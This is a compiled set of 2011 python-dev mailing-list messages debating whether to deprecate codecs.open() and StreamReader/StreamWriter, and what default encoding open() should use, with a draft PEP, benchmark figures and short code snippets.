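text_wrapper = io.TextIOWrapper(io.BytesIO(data), encoding="utf-8")
via_io = text_wrapper.read()

print(repr(via_codec))  # line endings are passed through untouched
print(repr(via_io))     # universal newlines translate "\r\n" to "\n"
```

The difference in newline handling is one of the issues listed in the PEP; the per-codec StreamReader class is the hook that would be lost if the codec-centric API were removed.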
Re: [Python-Dev] Draft PEP: Deprecate codecs.StreamReader and codecs.StreamWriter
Victor Stinner wrote: Hi, Last May, I proposed to deprecate the open() function and the StreamWriter and StreamReader classes of the codecs module. I agreed to keep open() after the discussion on python-dev. Here is a more complete proposal as a PEP. It is a draft and I expect a lot of comments :) The PEP's arguments for deprecating two essential codec design components are very one-sided, by comparing issues to features. Please add all the comments I've made on the subject to the PEP. The most important one missing is the fact and major difference that TextIOWrapper does not work on a per codec basis, but only on a per stream basis. By removing the StreamReader and StreamWriter API parts of the codec design, you essentially make it impossible to add per codec variations and optimizations that require full access to the stream interface. As mentioned before, many improvements are possible and lots of those can build on TextIOWrapper and the incremental codec parts. That said, I'm not really up for a longer discussion on this. We've already had the discussion and decided against removing those parts of the codec API. Redirecting codecs.open() to open() should be investigated. For the issues you mention in the PEP, please open tickets or add ticket references to the PEP. Thanks, -- Marc-Andre Lemburg, eGenix.com (Jul 07 2011)

Victor

---

PEP: xxx
Title: Deprecate codecs.StreamReader and codecs.StreamWriter
Version: $Revision$
Last-Modified: $Date$
Author: Victor Stinner
Status: Draft
Type: Standards Track
Content-Type: text/x-rst
Created: 28-May-2011
Python-Version: 3.3

Abstract
========

io.TextIOWrapper and codecs.StreamReaderWriter offer the same API [#f1]_. TextIOWrapper has more features and is faster than StreamReaderWriter. Duplicate code means that bugs should be fixed twice and that we may have subtle differences between the two implementations. The codecs module was introduced in Python 2.0, see the PEP 100. The io module was introduced in Python 2.6 and 3.0 (see the PEP 3116), and reimplemented in C in Python 2.7 and 3.1.

Motivation
==========

When the Python I/O model was updated for 3.0, the concept of a stream-with-known-encoding was introduced in the form of io.TextIOWrapper. As this class is critical to the performance of text-based I/O in Python 3, this module has an optimised C version which is used by CPython by default. Many corner cases in handling buffering, stateful codecs and universal newlines have been dealt with since the release of Python 3.0. This new interface overlaps heavily with the legacy codecs.StreamReader, codecs.StreamWriter and codecs.StreamReaderWriter interfaces that were part of the original codec interface design in PEP 100. These interfaces are organised around the principle of an encoding with an associated stream (i.e. the reverse of arrangement in the io module), so the original PEP 100 design required that codec writers provide appropriate StreamReader and StreamWriter implementations in addition to the core codec encode() and decode() methods. This places a heavy burden on codec authors providing these specialised implementations to correctly handle many of the corner cases that have now been dealt with by io.TextIOWrapper.
While deeper integration between the codec and the stream allows for additional optimisations in theory, these optimisations have in practice either not been carried out or else the associated code duplication means that the corner cases that have been fixed in io.TextIOWrapper are still not handled correctly in the various StreamReader and StreamWriter implementations. Accordingly, this PEP proposes that:

* codecs.open() be updated to delegate to the builtin open() in Python 3.3;
* the legacy codecs.Stream* interfaces, including the streamreader and streamwriter attributes of codecs.CodecInfo be deprecated in Python 3.3 and removed in Python 3.4.

Rationale
=========

StreamReader and StreamWriter issues
------------------------------------

* StreamReader is unable to translate newlines.
* StreamReaderWriter handles reads using StreamReader and writes using StreamWriter. These two classes may be inconsistent. To stay consistent, flush() must be
Re: [Python-Dev] open(): set the default encoding to 'utf-8' in Python 3.3?
Victor Stinner wrote: On Tuesday 28 June 2011 at 16:02 +0200, M.-A. Lemburg wrote: How about a more radical change: have open() in Py3 default to opening the file in binary mode, if no encoding is given (even if the mode doesn't include 'b') ? I tried your suggested change: Python doesn't start. No surprise there: it's an incompatible change, but one that undoes a wart introduced in the Py3 transition. Guessing encodings should be avoided whenever possible. sysconfig uses the implicit locale encoding to read sysconfig.cfg, the Makefile and pyconfig.h. I think that it is correct to use the locale encoding for Makefile and pyconfig.h, but maybe not for sysconfig.cfg. Python requires more changes just to run make. I was able to run make by using encoding='utf-8' in various functions (of distutils and setup.py). I didn't try the test suite, I expect too many failures. This demonstrates that Python's stdlib is still not being explicit about the encoding issues. I suppose that things just happen to work because we mostly use ASCII files for configuration and setup. -- Then I tried my suggestion (use utf-8 by default): Python starts correctly, I can build it (run make) and... the full test suite passes without any change. (I'm testing on Linux, my locale encoding is UTF-8.) I bet it would also pass with ascii in most cases. Which then just means that the Python build process and test suite are not a good test case for choosing a default encoding. Linux is also a poor test candidate for this, since most user setups will use UTF-8 as locale encoding. Windows, OTOH, uses all sorts of code page encodings (usually not UTF-8), so you are likely to hit the real problem cases a lot easier. -- Marc-Andre Lemburg, eGenix.com (Jun 29 2011)
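The point about ASCII-only configuration files can be checked directly. This is a minimal sketch with made-up sample content and an arbitrary selection of encodings; it shows why a build or test run over ASCII files says little about the choice of default encoding.

```python
ascii_only = b"prefix = /usr/local\n"
non_ascii = "pr\u00e9fixe = /usr/local\n".encode("utf-8")

# Arbitrary selection of ASCII-compatible encodings for the comparison.
encodings = ["ascii", "utf-8", "cp1252", "latin-1"]

# ASCII-only bytes decode to identical text under every encoding listed.
decoded = {enc: ascii_only.decode(enc) for enc in encodings}
all_same = len(set(decoded.values())) == 1

# Non-ASCII bytes either fail to decode or silently produce different text.
results = {}
for enc in encodings:
    try:
        results[enc] = non_ascii.decode(enc)
    except UnicodeDecodeError:
        results[enc] = None  # decoding failed under this encoding

print(all_same)
for enc, text in results.items():
    print(enc, repr(text))
```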
Re: [Python-Dev] open(): set the default encoding to 'utf-8' in Python 3.3?
Victor Stinner wrote: On Wednesday 29 June 2011 at 10:18 +0200, M.-A. Lemburg wrote: Victor Stinner wrote: On Tuesday 28 June 2011 at 16:02 +0200, M.-A. Lemburg wrote: How about a more radical change: have open() in Py3 default to opening the file in binary mode, if no encoding is given (even if the mode doesn't include 'b') ? I tried your suggested change: Python doesn't start. No surprise there: it's an incompatible change, but one that undoes a wart introduced in the Py3 transition. Guessing encodings should be avoided whenever possible. It means that all programs written for Python 3.0, 3.1, 3.2 will stop working with the new 3.x version (let's say 3.3). Users will have to migrate from Python 2 to Python 3.2, and then migrate from Python 3.2 to Python 3.3 :-( I wasn't suggesting doing this for 3.3, but we may want to start the usual feature change process to make the change eventually happen. I would prefer a ResourceWarning (emitted if the encoding is not specified), hidden by default: it doesn't break compatibility, and -Werror gives exactly the same behaviour that you expect. ResourceWarning is the wrong type of warning for this. I'd suggest to use a UnicodeWarning or perhaps create a new EncodingWarning instead. This demonstrates that Python's stdlib is still not being explicit about the encoding issues. I suppose that things just happen to work because we mostly use ASCII files for configuration and setup. I did more tests. I found some mistakes and sometimes the binary mode can be used, but most functions really expect the locale encoding (it is the correct encoding to read-write files). I agree that it would be good to have an explicit encoding=locale, but making it mandatory is a little bit rude. Again: Using a locale based default encoding will not work out in the long run. We've had those discussions many times in the past. I don't think there's anything bad about requiring the user to set an encoding if he wants to read text.
It makes him/her think twice about the encoding issue, which is good. And, of course, the stdlib should start using this explicit-is-better-than-implicit approach as well. Then I tried my suggestion (use utf-8 by default): Python starts correctly, I can build it (run make) and... the full test suite passes without any change. (I'm testing on Linux, my locale encoding is UTF-8.) I bet it would also pass with ascii in most cases. Which then just means that the Python build process and test suite are not a good test case for choosing a default encoding. Linux is also a poor test candidate for this, since most user setups will use UTF-8 as locale encoding. Windows, OTOH, uses all sorts of code page encodings (usually not UTF-8), so you are likely to hit the real problem cases a lot easier. I also ran the test suite on my patched Python (open uses UTF-8 by default) with ASCII locale encoding (LANG=C), the test suite does also pass. Many tests use non-ASCII characters, some of them are skipped if the locale encoding is unable to encode the tested text. Thanks for checking. So the build process and test suite are indeed not suitable test cases for the problem at hand. With just ASCII files to decode, Python will simply never fail to decode the content, regardless of whether you use an ASCII, UTF-8 or some Windows code page as locale encoding. -- Marc-Andre Lemburg, eGenix.com (Jun 29 2011)
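The warning-based approach discussed in this message could look roughly like the following. This is a hypothetical sketch: open_text is an invented helper name, not a stdlib function, and it uses the existing UnicodeWarning category as suggested above rather than any new warning class.

```python
import warnings


def open_text(path, mode="r", encoding=None, **kwargs):
    """Hypothetical wrapper around open() that warns on an implicit encoding."""
    if "b" not in mode and encoding is None:
        warnings.warn(
            "no encoding given; falling back to the locale encoding",
            UnicodeWarning,
            stacklevel=2,
        )
    return open(path, mode, encoding=encoding, **kwargs)
```

Callers that pass encoding="utf-8" (or open in binary mode) see no warning. Turning the warning into an error with warnings.simplefilter("error", UnicodeWarning) gives the stricter behaviour for anyone who wants the encoding to be mandatory.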
Re: [Python-Dev] open(): set the default encoding to 'utf-8' in Python 3.3?
Victor Stinner wrote:

In Python 2, open() opens the file in binary mode (e.g. file.readline() returns a byte string). codecs.open() opens the file in binary mode by default; you have to specify an encoding name to open it in text mode.

In Python 3, open() opens the file in text mode by default. (It only opens the file in binary mode if the file mode contains b.) The problem is that open() uses the locale encoding if the encoding is not specified, which is the case *by default*. The locale encoding can be:

- UTF-8 on Mac OS X, most Linux distributions
- ISO-8859-1 on some FreeBSD systems
- ANSI code page on Windows, e.g. cp1252 (close to ISO-8859-1) in Western Europe, cp932 in Japan, ...
- ASCII if the locale is manually set to an empty string or to C, or if the environment is empty, or by default on some systems
- something different depending on the system and user configuration...

If you develop under Mac OS X or Linux, you may have surprises when you run your program on Windows on the first non-ASCII character. You may not detect the problem if you only write text in English... until someone writes the first letter with a diacritic.

How about a more radical change: have open() in Py3 default to opening the file in binary mode if no encoding is given (even if the mode doesn't include 'b')? That would make it compatible with the Py2 world again and avoid all the encoding guessing.

Making such default encodings depend on the locale already failed to work when we first introduced a default encoding in Py2, so I don't understand why we are repeating the same mistake in Py3 (only in a different area).

Note that in Py2, Unix applications often leave out the 'b' mode, since there's no difference between using it or not. You'll only see a difference on Windows.

-- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Jun 28 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
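To illustrate the locale dependence discussed in this message, here is a minimal sketch (not taken from the thread) of how a Python 3 program can sidestep the guessing by always naming the encoding, or by using binary mode. The file name and sample text are made up for the example.

```python
import locale
import os
import tempfile

text = "na\u00efve caf\u00e9"  # sample text with non-ASCII characters

# The encoding open() falls back to when none is given; varies by system.
print("locale default:", locale.getpreferredencoding(False))

path = os.path.join(tempfile.mkdtemp(), "sample.txt")  # hypothetical file

# Explicit encoding: the bytes on disk no longer depend on the platform.
with open(path, "w", encoding="utf-8") as f:
    f.write(text)

# Binary mode: no decoding happens at all, as in the Py2 default.
with open(path, "rb") as f:
    raw = f.read()

# Reading back with the same explicit encoding round-trips the text.
with open(path, "r", encoding="utf-8") as f:
    roundtrip = f.read()
```

With the encoding spelled out on both sides, the round trip behaves the same on Windows, Linux and Mac OS X, whatever the locale says.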
[Python-Dev] Python language summit on ustream.tv
Dear Python Developers,

for the upcoming language summit at EuroPython, I'd like to try out whether streaming such meetings would work. I'll set up a webcam and stream the event live to a private channel on ustream.tv. These are the details in case you want to watch:

URL: http://www.ustream.tv/channel/python-language-summit
PWD: fpmUtuL4
Date: Sunday, 2011-06-19
Time: 10:00 - 16:00 CEST with breaks

I'm not sure whether I can stream the whole summit, but at least the morning session should be possible, provided the network works on that day. Interaction will likely be a bit difficult in case we have heated discussions :-), but we'll keep the IRC channel #python-language-summit on freenode open as well.

Thanks,
-- Marc-Andre Lemburg eGenix.com (#1, Jun 16 2011)
Re: [Python-Dev] cpython: Remove some extraneous parentheses and swap the comparison order to
Georg Brandl wrote:

On 06/07/11 05:20, brett.cannon wrote:

http://hg.python.org/cpython/rev/fc282e375703
changeset: 70695:fc282e375703
user: Brett Cannon br...@python.org
date: Mon Jun 06 20:20:36 2011 -0700
summary: Remove some extraneous parentheses and swap the comparison order to prevent accidental assignment. Silences a warning from LLVM/clang 2.9.

Swapping the comparison order here seems a bit inconsistent to me. There are lots of others around (e.g. len == 0 in the patch context below). Why is this one so special? I think that another developer even got told off once for these kinds of comparisons. I hope the Clang warning is only about the parentheses.

I agree with Georg: if ('u' == typecode) is not very readable, since you usually put the variable part on the left and the constant part on the right of an equality comparison. If clang warns about this, clang needs to be fixed, not our C code :-)

Georg

files:
  Modules/arraymodule.c | 2 +-
  1 files changed, 1 insertions(+), 1 deletions(-)

diff --git a/Modules/arraymodule.c b/Modules/arraymodule.c
--- a/Modules/arraymodule.c
+++ b/Modules/arraymodule.c
@@ -2091,7 +2091,7 @@
     if (len == 0) {
         return PyUnicode_FromFormat("array('%c')", (int)typecode);
     }
-    if ((typecode == 'u'))
+    if ('u' == typecode)
         v = array_tounicode(a, NULL);
     else
         v = array_tolist(a, NULL);

-- Marc-Andre Lemburg eGenix.com (#1, Jun 07 2011)
Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader
Victor Stinner wrote:

On Wednesday 25 May 2011 at 15:43 +0200, M.-A. Lemburg wrote:

For UTF-16 it would e.g. make sense to always read data in blocks with even sizes, removing the trial-and-error decoding and extra buffering currently done by the base classes. For UTF-32, the blocks should have size % 4 == 0. For UTF-8 (and other variable length encodings) it would make sense to look at the end of the (bytes) data read from the stream to see whether a complete code point was read or not, rather than simply running the decoder on the complete data set, only to find that a few bytes at the end are missing.

I think that the readahead algorithm is much faster than trying to avoid partial input, and it's not a problem to have partial input if you use an incremental decoder.

Depends on where you're coming from. For non-seekable streams such as sockets or pipes, readahead is not going to work. For seekable streams, I agree that readahead is the better strategy. And of course, it also makes sense to use incremental decoders for these encodings.

For single character encodings, it would make sense to prefetch data in big chunks and skip all the trial and error decoding implemented by the base classes to address the above problem with variable length encodings.

TextIOWrapper implements this optimization using its readahead algorithm.

It does, yes, but the above was an optimization specific to single character encodings, not all encodings, and TextIOWrapper doesn't know anything about specific characteristics of the underlying encodings (except perhaps a few special cases).

That's somewhat unfair: TextIOWrapper is implemented in C, whereas the StreamReader/Writer subclasses used by the codecs are written in Python. A fair comparison would use the Python implementation of TextIOWrapper.

Do you mean that you would like to reimplement codecs in C?

As use of Unicode codecs increases in Python applications, this would certainly be an approach to consider, yes. Looking at the current situation, it is better to use TextIOWrapper as it provides better performance, but since TextIOWrapper cannot (by design) provide per-codec optimizations, this is likely to change with a rewrite in C of those codecs that benefit a lot from such specific optimizations.

It is not relevant to compare codecs and _pyio, because codecs reuses BufferedReader (of the io module, not of the _pyio module), and io is the main I/O module of Python 3.

They both use whatever stream you pass in as parameter, so your TextIOWrapper benchmark will also use the BufferedReader of the io module. The point here is to compare Python to Python, not Python to C.

But well, as you want, here is a benchmark comparing _pyio.TextIOWrapper(io.open(filename, 'rb'), encoding) and codecs.open(filename, encoding). The only change from my previous bench.py script is the test_io() function:

    def test_io(test_func, chunk_size):
        with open(FILENAME, 'rb') as buffered:
            f = _pyio.TextIOWrapper(buffered, ENCODING)
            test_file(f, test_func, chunk_size)
            f.close()

Thanks for running those tests.

(1) Decode Objects/unicodeobject.c (317336 characters) from utf-8

test_io.readline(): 1193.4 ms
test_codecs.readline(): 1267.9 ms - codecs 6% slower than io
test_io.read(1): 21696.4 ms
test_codecs.read(1): 36027.2 ms - codecs 66% slower than io
test_io.read(100): 3080.7 ms
test_codecs.read(100): 3901.7 ms - codecs 27% slower than io

This shows that StreamReader/Writer could benefit quite a bit from using incremental encoders/decoders.

test_io.read(): 3991.0 ms
test_codecs.read(): 1736.9 ms - codecs 130% FASTER than io

No surprise here. It's also a very common use case to read the whole file in one go, and the bigger the file, the more impact this has.

(2) Decode README (6613 characters) from ascii

test_io.readline(): 678.1 ms
test_codecs.readline(): 760.5 ms - codecs 12% slower than io
test_io.read(1): 13533.2 ms
test_codecs.read(1): 21900.0 ms - codecs 62% slower than io
test_io.read(100): 2663.1 ms
test_codecs.read(100): 3270.1 ms - codecs 23% slower than io
test_io.read(): 6769.1 ms
test_codecs.read(): 3919.6 ms - codecs 73% FASTER than io

See above.

(3) Decode Lib/test/cjkencodings/gb18030.txt (501 characters) from gb18030

test_io.readline(): 38.9 ms
test_codecs.readline(): 15.1 ms - codecs 157% FASTER than io
test_io.read(1): 369.8 ms
test_codecs.read(1): 302.2 ms - codecs 22% FASTER than io
test_io.read(100): 258.2 ms
test_codecs.read(100): 155.1 ms - codecs 67% FASTER than io
test_io.read(): 1803.2 ms
test_codecs.read(): 1002.9 ms - codecs 80% FASTER than io

These results are interesting since gb18030 is a shift encoding which keeps state in the encoded data stream, so the strategy chosen by TextIOWrapper doesn't work out that well. It hints at what I mentioned above: per codec optimizations are going to be relevant once
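For readers checking the "N% slower / FASTER" annotations in the benchmark output, the following sketch shows one way such figures can be derived from the two timings. The bench.py script itself is not shown in the thread, so the helper name relative_speed and the rounding are assumptions; the first three posted figures for test (1) do come out the same this way.

```python
def relative_speed(io_ms, codecs_ms):
    """Describe the codecs timing relative to the io timing (hypothetical helper)."""
    if codecs_ms >= io_ms:
        # codecs took longer: express the extra time as a share of the io time
        pct = (codecs_ms / io_ms - 1) * 100
        return "codecs %.0f%% slower than io" % pct
    # codecs took less time: express the io time relative to the codecs time
    pct = (io_ms / codecs_ms - 1) * 100
    return "codecs %.0f%% FASTER than io" % pct


# Timings copied from test (1) of the benchmark.
print(relative_speed(1193.4, 1267.9))    # readline()
print(relative_speed(21696.4, 36027.2))  # read(1)
print(relative_speed(3991.0, 1736.9))    # read()
```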
Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader
Victor Stinner wrote:

On Friday 27 May 2011 10:17:29, M.-A. Lemburg wrote:

I am still -1 on deprecating the StreamReader/Writer parts of the codec APIs. I've given numerous reasons why these are useful, what their intention is, and why they were added to Python 1.6.

codecs.open() now uses TextIOWrapper, so there is no good reason to keep StreamReader or StreamWriter. You did not give me any use case where StreamReader or StreamWriter should be used instead of TextIOWrapper. You only listed theoretical optimizations. You have until the release of Python 3.3 to prove that StreamReader and/or StreamWriter can be faster than TextIOWrapper. If you can prove it using a patch and a benchmark, I will be OK with reverting my commit.

Victor, please revert the change. It has *not* been approved!

If we went by your reasoning for deprecating and eventually removing parts of the stdlib or Python's subsystems, we'd end up with a bare-bones version of Python. That's not what we want and it's not what our users want.

I have tried to explain the design decisions and reasons for those codec APIs at great length. You've pretty much used up my patience. If you are not going to revert the patch, I will.

Since such a deprecation would change an important documented API, please write a PEP outlining your reasoning, including my comments, use cases and possibilities for optimizations.

OK, I will write a PEP explaining why StreamReader and StreamWriter are deprecated.

Wrong order: first write a PEP, then discuss, then get approval, then patch.

-- Marc-Andre Lemburg eGenix.com (#1, May 27 2011)
Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader
Victor Stinner wrote:

On Friday 27 May 2011 15:42:10, M.-A. Lemburg wrote:

If we went by your reasoning for deprecating and eventually removing parts of the stdlib or Python's subsystems, we'd end up with a bare-bones version of Python. That's not what we want and it's not what our users want.

I don't want to deprecate the whole stdlib, just duplicate old APIs, to follow the "import this" mantra: There should be one-- and preferably only one --obvious way to do it.

What people tend to miss in this mantra is the last part: obvious. It doesn't say: there should only be one way to do it. There can be many ways, but there should preferably be only one *obvious* way.

Using codecs.open() is not obvious in Python 3, since the standard open() already provides a way to access an encoded stream. Using a builtin is the obvious way to go.

It is obvious in Python 2, where the standard open() doesn't provide a way to define an encoding, so the user has to explicitly look for this kind of API and then find it in the obvious (to some extent) codecs module, since that's where encodings happen in Python 2.

Having multiple ways to do things is the most natural thing on earth and it's good that way. Python does not and should not force people into doing things in one dictated right way. It should, however, provide natural choices and obvious hints to find a good solution. And that's what the Zen mantra is all about.

It's difficult for a user to choose between open() and codecs.open().

As I mentioned on the ticket and in my replies: I'm not against changing codecs.open() to use a variant that is based on TextIOWrapper, provided there are no user noticeable compatibility issues.

Thanks for reverting the patch.

Have a nice weekend,
-- Marc-Andre Lemburg eGenix.com (#1, May 27 2011)
Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader
Walter Dörwald wrote:

On 24.05.11 12:58, Victor Stinner wrote:

On Tuesday 24 May 2011 at 12:42 +0200, Łukasz Langa wrote:

Message written by Walter Dörwald on 2011-05-24, at 12:16:

I don't see which use case is not covered by TextIOWrapper. But I know some cases which are not supported by StreamReader/StreamWriter.

This could be partially fixed by implementing generic StreamReader/StreamWriter classes that reuse the incremental codecs, but I don't think that's worth it.

Why not?

We already have an implementation of this idea; it is called io.TextIOWrapper.

Exactly. From another post by Victor: As I wrote, codecs.open() is useful in Python 2. But I don't know any program or library directly using StreamReader or StreamWriter. So: implementing this is a lot of work, duplicates existing functionality and is mostly unused.

You are missing the point: we have StreamReader and StreamWriter APIs on codecs to allow each codec to implement more efficient ways of encoding and decoding streams. Examples of such optimizations are reading the stream in chunks that can be decoded in one piece, or writing to the stream in a way that doesn't generate encoding state problems on the receiving end by ending transmission half-way through a shift block.

Of course, you won't find many direct uses of these APIs, since most of the time applications will simply use codecs.open() to automatically benefit from these optimizations.

OTOH, TextIOWrapper doesn't know anything about specific encodings and thus does not allow for such optimizations to be implemented by codecs.

We don't have many such specialized implementations in the stdlib, but this doesn't mean that there's no use for them. It just means that developers and users are simply unaware of the possibilities opened up by these stateful stream APIs.

-- Marc-Andre Lemburg eGenix.com (#1, May 25 2011)
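As a concrete view of the two layers argued about here, the sketch below (an illustration added for this archive, not code from the thread) looks up a codec and shows that it registers its own StreamReader/StreamWriter classes next to the incremental decoder that io.TextIOWrapper drives. The sample string is arbitrary.

```python
import codecs
import io

info = codecs.lookup("utf-16")

# Each registered codec supplies its own stream classes ...
reader_cls = info.streamreader
writer_cls = info.streamwriter
# ... alongside the incremental classes that io.TextIOWrapper relies on.
decoder_cls = info.incrementaldecoder

raw = "h\u00e9llo\n".encode("utf-16")  # encoded bytes start with a BOM

# Codec-provided StreamReader wrapped around a binary stream.
via_codecs = reader_cls(io.BytesIO(raw)).read()

# Generic wrapper that knows nothing codec-specific beyond the name.
via_io = io.TextIOWrapper(io.BytesIO(raw), encoding="utf-16", newline="").read()

print(reader_cls, decoder_cls)
print(via_codecs == via_io)
```

Both paths decode the same text; the disagreement in the thread is about where per-codec optimizations could live, not about the results.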
Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader
Victor Stinner wrote:

On Wednesday 25 May 2011 at 11:38 +0200, M.-A. Lemburg wrote:

You are missing the point: we have StreamReader and StreamWriter APIs on codecs to allow each codec to implement more efficient ways of encoding and decoding streams. Examples of such optimizations are reading the stream in chunks that can be decoded in one piece, or writing to the stream in a way that doesn't generate encoding state problems on the receiving end by ending transmission half-way through a shift block. ... We don't have many such specialized implementations in the stdlib, but this doesn't mean that there's no use for them. It just means that developers and users are simply unaware of the possibilities opened up by these stateful stream APIs.

Does at least one codec implement such an optimization in its StreamReader or StreamWriter class? And can't we implement such optimizations in incremental encoders and decoders (or in TextIOWrapper)?

I don't see how, since you need control over the file API methods in order to implement such optimizations. OTOH, adding lots of special cases to TextIOWrapper isn't a good idea either, since these optimizations would then only trigger for a small number of codecs and completely leave out 3rd party codecs.

I checked all multibyte codecs (UTF and CJK codecs) and I don't see any such optimization. UTF codecs handle the BOM, but don't have anything looking like an optimization. CJK codecs use multibytecodec, MultibyteStreamReader and MultibyteStreamWriter, which don't look to be optimized. But maybe I missed something?

No, you haven't missed such per-codec optimizations. The base classes implement general purpose support for reading from streams in chunks, but the support isn't optimized per codec.

For UTF-16 it would e.g. make sense to always read data in blocks with even sizes, removing the trial-and-error decoding and extra buffering currently done by the base classes. For UTF-32, the blocks should have size % 4 == 0.

For UTF-8 (and other variable length encodings) it would make sense to look at the end of the (bytes) data read from the stream to see whether a complete code point was read or not, rather than simply running the decoder on the complete data set, only to find that a few bytes at the end are missing.

For single character encodings, it would make sense to prefetch data in big chunks and skip all the trial and error decoding implemented by the base classes to address the above problem with variable length encodings.

Finally, all this could be implemented in C, reducing the Python call overhead dramatically.

TextIOWrapper has an advanced buffer algorithm to prefetch (readahead) some bytes at each read to speed up small reads. It is difficult to implement such an algorithm, but it's done and it works.

-- OK, let's stop talking about theoretical optimizations, and let's do a benchmark to compare the codecs and io modules on reading files!

That's somewhat unfair: TextIOWrapper is implemented in C, whereas the StreamReader/Writer subclasses used by the codecs are written in Python. A fair comparison would use the Python implementation of TextIOWrapper.

-- Marc-Andre Lemburg eGenix.com (#1, May 25 2011)
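The UTF-8 idea above (inspect the end of the bytes read to see whether the last code point is complete) can be sketched as follows. This is an illustration only: incomplete_utf8_tail is a hypothetical helper, it assumes the input is otherwise valid UTF-8, and it is not how the stdlib codecs are implemented. The incremental decoder is shown next to it for comparison, since it handles the same situation by buffering the pending bytes internally.

```python
import codecs


def incomplete_utf8_tail(data):
    """Return how many trailing bytes form an unfinished UTF-8 sequence.

    Hypothetical helper; assumes `data` is otherwise valid UTF-8.
    """
    # A UTF-8 sequence is at most 4 bytes long, so look back at most 3 bytes.
    for back in range(1, min(3, len(data)) + 1):
        byte = data[-back]
        if byte & 0xC0 == 0x80:   # continuation byte: keep looking back
            continue
        if byte >= 0xF0:
            need = 4              # lead byte of a 4-byte sequence
        elif byte >= 0xE0:
            need = 3
        elif byte >= 0xC0:
            need = 2
        else:
            need = 1              # ASCII byte: nothing pending
        return back if back < need else 0
    return 0


encoded = "price: 5 \u20ac".encode("utf-8")  # the euro sign takes 3 bytes
chunk = encoded[:-1]                           # a read that stops inside it

pending = incomplete_utf8_tail(chunk)
head = chunk[:len(chunk) - pending].decode("utf-8")

# The incremental decoder keeps the 2 pending bytes until the rest arrives.
dec = codecs.getincrementaldecoder("utf-8")()
head_incremental = dec.decode(chunk)
rest = dec.decode(encoded[-1:], final=True)
```

For UTF-16 and UTF-32 the equivalent check is simpler: only decode len(data) rounded down to a multiple of 2 or 4 bytes, as the message suggests.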
Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader
Victor Stinner wrote:

Hi, In Python 2, codecs.open() is the best way to read and/or write files using Unicode. But in Python 3, open() is preferred with its fast io module. I would like to deprecate codecs.open() because it can be replaced by open() and io.TextIOWrapper. I would like your opinion and that's why I'm writing this email.

I think you should have moved this part of your email further up, since it explains the reason why this idea was rejected for now:

I opened an issue for this idea. Brett and Marc-Andre Lemburg don't want to deprecate codecs.open() & friends because they want to be able to write code working on Python 2 and on Python 3 without any change. I don't think it's realistic: nontrivial programs require at least the six module, and most likely the 2to3 program. The six module can have its codecs.open function if codecs.open is removed from Python 3.4.

And now for something completely different:

codecs.open() and the StreamReader, StreamWriter and StreamReaderWriter classes of the codecs module don't support universal newlines, still have some issues with stateful codecs (like UTF-16/32 BOMs), and each codec has to implement a StreamReader and a StreamWriter class. StreamReader and StreamWriter are stateless codecs (no reset() or setstate() method), and so it's not possible to write a generic fix for all child classes in the codecs module. Each stateful codec has to handle special cases like seek() problems. For example, the UTF-16 codec duplicates some IncrementalEncoder/IncrementalDecoder code in its StreamWriter/StreamReader class.

Please read PEP 100 regarding StreamReader and StreamWriter. Those codec parts were explicitly designed to be stateful, unlike the stateless encoder/decoder methods.

Please read my reply on the ticket:

StreamReader and StreamWriter classes provide the base codec implementations for stateful interaction with streams. They define the interface and provide a working implementation for those codecs that choose not to implement their own variants. Each codec can, however, implement variants which are optimized for the specific encoding or intercept certain stream methods to add functionality or improve the encoding/decoding performance. Both are essential parts of the codec interface.

TextIOWrapper and StreamReaderWriter are merely wrappers around streams that make use of the codecs. They don't provide any codec logic themselves. That's the conceptual difference.

The io module is well tested, supports non-seekable streams, correctly handles corner cases (like UTF-16/32 BOMs) and supports any kind of newlines, including a universal newline mode. TextIOWrapper reuses incremental encoders and decoders, so BOM issues were fixed only once, in TextIOWrapper.

It's trivial to replace a call to codecs.open() by a call to open(), because the two APIs are very close. The main difference is that codecs.open() doesn't support universal newlines, so you have to use open(..., newline='') to keep the same behaviour (keep newlines unchanged). This task can be done by 2to3. But I suppose that most people will be happy with the universal newline mode.

I don't see which use case is not covered by TextIOWrapper. But I know some cases which are not supported by StreamReader/StreamWriter.

This is a misunderstanding of the concepts behind the two. StreamReader and StreamWriter are implemented by the codecs; they are part of the API that each codec has to provide in order to register in the Python codecs system. Their purpose is to provide a stateful interface and work efficiently and directly on streams rather than buffers.

Here's my reply from the ticket regarding using incremental encoders/decoders for the StreamReader/Writer parts of the codec set of APIs:

The point about having them use incremental codecs for encoding and decoding is a good one and would need to be investigated. If possible, we could use incremental encoders/decoders for the standard StreamReader/Writer base classes or add new IncrementalStreamReader/Writer classes which then use the IncrementalEncode/Decoder per default. Please open a new ticket for this.

StreamReader, StreamWriter, StreamReaderEncoder and EncodedFile are not used in the Python 3 standard library. I tried removing them: except for the tests in test_codecs which test them directly, the full test suite passes.

Read the issue for more information: http://bugs.python.org/issue8796

-- Marc-Andre Lemburg eGenix.com (#1, May 24 2011)
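The newline point made in this message (use open(..., newline='') to keep newlines unchanged, as codecs.open() does) can be checked with a short sketch. The temporary file and its contents are invented for the example.

```python
import os
import tempfile

path = os.path.join(tempfile.mkdtemp(), "mixed.txt")  # hypothetical file

# Write raw bytes so the three different line endings reach the disk as-is.
with open(path, "wb") as f:
    f.write("a\r\nb\rc\n".encode("utf-16"))

# Default text mode: universal newlines, every line ending becomes "\n".
with open(path, encoding="utf-16") as f:
    translated = f.read()

# newline="": line endings are passed through untouched.
with open(path, encoding="utf-16", newline="") as f:
    untouched = f.read()

print(repr(translated))
print(repr(untouched))
```

Code ported from codecs.open() that depends on seeing the original line endings would need the second form; everything else can take the default.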
